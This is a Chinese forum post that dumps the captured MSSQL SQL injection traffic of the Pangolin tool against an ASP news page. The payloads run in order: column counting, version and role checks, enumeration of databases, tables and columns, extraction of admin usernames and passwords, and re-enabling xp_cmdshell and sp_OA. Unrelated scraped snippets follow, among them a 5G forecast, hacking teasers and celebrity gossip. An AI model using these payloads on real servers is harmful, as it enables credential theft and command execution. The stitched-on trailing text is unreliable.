作者:TheLostMind
看了下穿山甲,很牛X的工具,抓了下包,随便整理了以下,无聊时看看……
===============================================
Target url is : http://www.xxx.com/news.asp?class_id=1165
HTTP Method is : GET
Inject type is : Integer
Do you really want to delete it?
Field count is : 14
The field's count 14
The string field position at 2
抓包内容:
union all select null-- and 1=1
union all select null,null-- and 1=1
union all select null,null,null-- and 1=1
这里省略…………………………………………
union all select null,null,null,null,null,null,null,null,null,null,null,null,null-- and 1=1
union all select null,null,null,null,null,null,null,null,null,null,null,null,null,null-- and 1=1
and 1=2 union all select cast
(0x616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161 as varchar
(8000)),null,null,null,null,null,null,null,null,null,null,null,null,null-- and 1=1
and 1=2 union all select null,cast
(0x616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161 as varchar
(8000)),null,null,null,null,null,null,null,null,null,null,null,null-- and 1=1
and 1=2 union all select null,cast(db_name() as nvarchar
(4000)),null,null,null,null,null,null,null,null,null,null,null,null -- and 1=1
获取综合信息:
and 1=2 union all select null,cast(@@version as nvarchar
(4000)),null,null,null,null,null,null,null,null,null,null,null,null -- and 1=1
and 1=2 union all select null,cast(db_name() as nvarchar
(4000)),null,null,null,null,null,null,null,null,null,null,null,null -- and 1=1
and 1=2 union all select null,cast(@@servername as nvarchar
(4000)),null,null,null,null,null,null,null,null,null,null,null,null -- and 1=1
and 1=2 union all select null,cast(system_user as nvarchar
(4000)),null,null,null,null,null,null,null,null,null,null,null,null -- and 1=1
and 1=2 union all select null,cast(user as nvarchar
(4000)),null,null,null,null,null,null,null,null,null,null,null,null -- and 1=1
and 1=2 union all select null,cast(is_srvrolemember(0x730079007300610064006d0069006e00) as nvarchar
(4000)),null,null,null,null,null,null,null,null,null,null,null,null -- and 1=1
and 1=2 union all select null,cast(is_member(0x640062005f006f0077006e0065007200) as nvarchar
(4000)),null,null,null,null,null,null,null,null,null,null,null,null -- and 1=1
and 1=2 union all select top 1 null,cast(cast([name] as nvarchar(4000)) cast([filename] as nvarchar(4000)) as
nvarchar(4000)),null,null,null,null,null,null,null,null,null,null,null,null from (select top 1 dbid,name,filename
from (select top 1 dbid,name,filename from [master].[dbo].[sysdatabases] order by 1) t order by 1 desc)t-- and 1=1
and 1=2 union all select top 1 null,cast(cast([name] as nvarchar(4000)) cast([filename] as nvarchar(4000)) as
nvarchar(4000)),null,null,null,null,null,null,null,null,null,null,null,null from (select top 1 dbid,name,filename
from (select top 2 dbid,name,filename from [master].[dbo].[sysdatabases] order by 1) t order by 1 desc)t-- and 1=1
and 1=2 union all select top 1 null,cast(cast([name] as nvarchar(4000)) cast([filename] as nvarchar(4000)) as
nvarchar(4000)),null,null,null,null,null,null,null,null,null,null,null,null from (select top 1 dbid,name,filename
from (select top 3 dbid,name,filename from [master].[dbo].[sysdatabases] order by 1) t order by 1 desc)t-- and 1=1
and 1=2 union all select top 1 null,cast(cast([name] as nvarchar(4000)) cast([filename] as nvarchar(4000)) as
nvarchar(4000)),null,null,null,null,null,null,null,null,null,null,null,null from (select top 1 dbid,name,filename
from (select top 4 dbid,name,filename from [master].[dbo].[sysdatabases] order by 1) t order by 1 desc)t-- and 1=1
这里省略……………………
and 1=2 union all select top 1 null,cast(cast([name] as nvarchar(4000)) cast([filename] as nvarchar(4000)) as
nvarchar(4000)),null,null,null,null,null,null,null,null,null,null,null,null from (select top 1 dbid,name,filename
from (select top 40 dbid,name,filename from [master].[dbo].[sysdatabases] order by 1) t order by 1 desc)t-- and 1=1
;drop table foofoofoo;-- and 1=1
;create table foofoofoo(name nvarchar(255),low nvarchar(255),high nvarchar(255),type nvarchar(255));-- and 1=1
;insert foofoofoo exec master.dbo.xp_availablemedia;-- and 1=1
and 1=2 union all select top 1 null,cast(cast([name] as nvarchar(4000)) cast([type] as nvarchar(4000)) as nvarchar
(4000)),null,null,null,null,null,null,null,null,null,null,null,null from (select top 1 * from (select top 1 * from
foofoofoo order by [name] group by name) t order by [name] desc)t-- and 1=1
;drop table foofoofoo;-- and 1=1
;create table foofoofoo(name nvarchar(255),description nvarchar(4000));-- and 1=1
;insert foofoofoo exec master.dbo.xp_enumgroups;-- and 1=1
and 1=2 union all select top 1 null,cast(cast([name] as nvarchar(4000)) cast([description] as nvarchar(4000)) as
nvarchar(4000)) ,null,null,null,null,null,null,null,null,null,null,null,null from (select top 1 * from (select top
1 * from foofoofoo order by [name] group by name) t order by [name] desc)t-- and 1=1
;drop table foofoofoo;-- and 1=1
获取表:
and 1=2 union all select null,cast(cast(count(*) as varchar(10)) as nvarchar
(4000)),null,null,null,null,null,null,null,null,null,null,null,null from [sky_yanjiusuo]..[sysobjects] where
xtype=char(85) and status>0--
and 1=2 union all select top 1 null,cast(cast(name as varchar(256)) as nvarchar
(4000)),null,null,null,null,null,null,null,null,null,null,null,null from (select top 1 id,name from (select top 1
id,name from [sky_yanjiusuo]..[sysobjects] where xtype=char(85) and status>0 order by 1) t order by 1 desc)t--
and 1=2 union all select top 1 null,cast(cast(name as varchar(256)) as nvarchar
(4000)),null,null,null,null,null,null,null,null,null,null,null,null from (select top 1 id,name from (select top 2
id,name from [sky_yanjiusuo]..[sysobjects] where xtype=char(85) and status>0 order by 1) t order by 1 desc)t--
这里省略………………
and 1=2 union all select top 1 null,cast(cast(name as varchar(256)) as nvarchar
(4000)),null,null,null,null,null,null,null,null,null,null,null,null from (select top 1 id,name from (select top 15
id,name from [sky_yanjiusuo]..[sysobjects] where xtype=char(85) and status>0 order by 1) t order by 1 desc)t--
获取列:
and 1=2 union all select top 1 null,cast(cast(id as nvarchar(20)) as nvarchar
(4000)),null,null,null,null,null,null,null,null,null,null,null,null from [sky_yanjiusuo]..[sysobjects] where
name=0x73006b0079005f005500730065007200--
and 1=2 union all select null,cast(cast(count(*) as varchar(10)) as nvarchar
(4000)),null,null,null,null,null,null,null,null,null,null,null,null from [sky_yanjiusuo]..[syscolumns] where
id=2068202418--
and 1=2 union all select top 1 null,cast(cast(name as varchar(8000)) as nvarchar
(4000)),null,null,null,null,null,null,null,null,null,null,null,null from (select top 1 colid,name from (select top
1 colid,name from [sky_yanjiusuo]..[syscolumns] where id=2068202418 order by 1) t order by 1 desc)t--
and 1=2 union all select top 1 null,cast(cast(name as varchar(8000)) as nvarchar
(4000)),null,null,null,null,null,null,null,null,null,null,null,null from (select top 1 colid,name from (select top
2 colid,name from [sky_yanjiusuo]..[syscolumns] where id=2068202418 order by 1) t order by 1 desc)t--
这里省略……………………
and 1=2 union all select top 1 null,cast(cast(name as varchar(8000)) as nvarchar
(4000)),null,null,null,null,null,null,null,null,null,null,null,null from (select top 1 colid,name from (select top
10 colid,name from [sky_yanjiusuo]..[syscolumns] where id=2068202418 order by 1) t order by 1 desc)t--
and 1=2 union all select top 1 null,cast(cast(name as varchar(8000)) as nvarchar
(4000)),null,null,null,null,null,null,null,null,null,null,null,null from (select top 1 colid,name from (select top
11 colid,name from [sky_yanjiusuo]..[syscolumns] where id=2068202418 order by 1) t order by 1 desc)t--
获取内容:
and 1=2 union all select null,cast(cast(count(*) as varchar(8000)) as nvarchar
(4000)),null,null,null,null,null,null,null,null,null,null,null,null from [sky_yanjiusuo]..[sky_user] where 1=1--
and 1=2 union all select top 1 null,cast(cast(id as varchar) as nvarchar
(4000)),null,null,null,null,null,null,null,null,null,null,null,null from (select top 1 id from (select top 1 id
from [sky_yanjiusuo]..[sky_user] where 1=1 order by 1) t order by 1 desc)t--
and 1=2 union all select top 1 null,cast(cast(admin_name as varchar) as nvarchar
(4000)),null,null,null,null,null,null,null,null,null,null,null,null from (select top 1 admin_name from (select top
1 admin_name from [sky_yanjiusuo]..[sky_user] where 1=1 order by 1) t order by 1 desc)t--
and 1=2 union all select top 1 null,cast(cast(admin_password as varchar) as nvarchar
(4000)),null,null,null,null,null,null,null,null,null,null,null,null from (select top 1 admin_password from (select
top 1 admin_password from [sky_yanjiusuo]..[sky_user] where 1=1 order by 1) t order by 1 desc)t--
and 1=2 union all select top 1 null,cast(cast(id as varchar) as nvarchar
(4000)),null,null,null,null,null,null,null,null,null,null,null,null from (select top 1 id from (select top 2 id
from [sky_yanjiusuo]..[sky_user] where 1=1 order by 1) t order by 1 desc)t--
and 1=2 union all select top 1 null,cast(cast(admin_name as varchar) as nvarchar
(4000)),null,null,null,null,null,null,null,null,null,null,null,null from (select top 1 admin_name from (select top
2 admin_name from [sky_yanjiusuo]..[sky_user] where 1=1 order by 1) t order by 1 desc)t--
and 1=2 union all select top 1 null,cast(cast(admin_password as varchar) as nvarchar
(4000)),null,null,null,null,null,null,null,null,null,null,null,null from (select top 1 admin_password from (select
top 2 admin_password from [sky_yanjiusuo]..[sky_user] where 1=1 order by 1) t order by 1 desc)t--
恢复XP_CMDSHELL:
and substring(cast(serverproperty(0x700072006f006400750063007400760065007200730069006f006e00) as nvarchar(4000)),
1, 1)>8
;exec master.dbo.sp_addextendedproc 0x780070005f0063006d0064007300680065006c006c00,
0x780070006c006f006700370030002e0064006c006c00--
恢复SP_OA……
;exec master.dbo.sp_addextendedproc 0x730070005f004f004100430072006500610074006500,
0x780070006c006f006700370030002e0064006c006c00--
列磁盘:
;drop table foofoofoo;--
;create table foofoofoo(name nvarchar(255),low nvarchar(255),high nvarchar(255),type nvarchar(255));--
;insert foofoofoo exec master.dbo.xp_availablemedia;--
and 1=2 union all select top 1 null,cast(cast([name] as nvarchar(4000))cast([type] as nvarchar(4000)) as nvarchar
(4000)),null,null,null,null,null,null,null,null,null,null,null,null from (select top 1 * from (select top 1 * from
foofoofoo order by [name] group by name) t order by [name] desc)t--
;drop table foofoofoo;--
不抓了。。。。自己抓吧………………
==============================================
根据《GSMA:2019年全球移动经济报告》和《华为GIV 2025》的预测,到2025年全球5G用户数量将达到28亿,IoT联接数量将达到1000亿。企业办公视频会议、移动教学、远程医疗对图像...
黑客原来是这样远程攻击劫持安卓手机 四年前,知名黑客安排东方联盟的安全研讨人员发现了一种运用名为Rowhammer的黑客技术长途劫持Android手机的有用方法。 怎么样才能查询别人微信聊天记录...
保护个人信息安全,不做信息时代的“透明人”,在消息时代大踏步进步的本日,人们在享用消息社会带来的智能、高效、方便的同时,也对消息平安…深感忧愁。“消息裸奔”让人们成为“通明人”,隐衷泄漏层见叠出,财富...
源码下载http://down.chinaz.com/soft/19655.htm 官方网站http://www.melyysoft.com/ 漏洞等级:高 Google搜索:"0351-606189...
《权力的游戏》“雪诺”基特·哈灵顿与“耶哥蕊特”萝斯·莱斯利戏外也成了一对,去年9月订婚,今年6月结婚。但近日,推特账号EUTkings发布了哈灵顿的多张床照,称一名俄罗斯女学妹表示与哈灵顿“厮混”了...
影响版本:WinAsm Studio 5.1.5.0漏洞描述:BUGTRAQ ID: 34132 WinAsm Studio是用于使用汇编器开发32位Windows和16位DOS程序的免费集成开发环...